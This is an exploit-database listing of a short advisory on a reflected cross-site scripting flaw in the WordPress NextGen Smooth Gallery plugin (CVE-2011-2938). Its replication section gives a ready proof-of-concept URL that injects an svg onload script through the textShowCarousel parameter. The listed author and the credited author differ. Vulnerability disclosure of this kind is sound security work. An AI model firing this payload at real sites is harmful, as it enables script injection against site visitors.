Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2011-2938 | CWE-79 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Aliaksandr Hartsuyeu | High | Remote | 2017-11-01 |
------------------------------------------- WordPress SmoothGallery - NextGen Gallery XSS By SonnySpooks ------------------------------------------- 1. [About App] ------------------------------------------- NextGen Gallery is a plugin used for Smooth gallery modulation and appearance On Multiple Sites. ------------------------------------------- 2. [Issue With It] ------------------------------------------- The File of nggSmoothFrame.php Carries. a parameter ?textShowCarousel= that reflects parses in the <script> area is easily effected by arbitrary code. ------------------------------------------- 3. [Replication of attack] ------------------------------------------- Example: "site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=0&textShowCarousel=</script><svg/onload=alert(/XSSPOSED/)>" ------------------------------------------- ________ /\ \ / \ \ / \ \ / \_______\ \ / / ___\ / ____/___ /\ \ / /\ \ / \ \/___/ \ \ / \ \ \ \ / \_______\ \_______\ \ / / / / \ / / / / \ / /\ / / \/_______/ \/_______/ -------------------------------------------
Copyright ©2024 Exploitalert.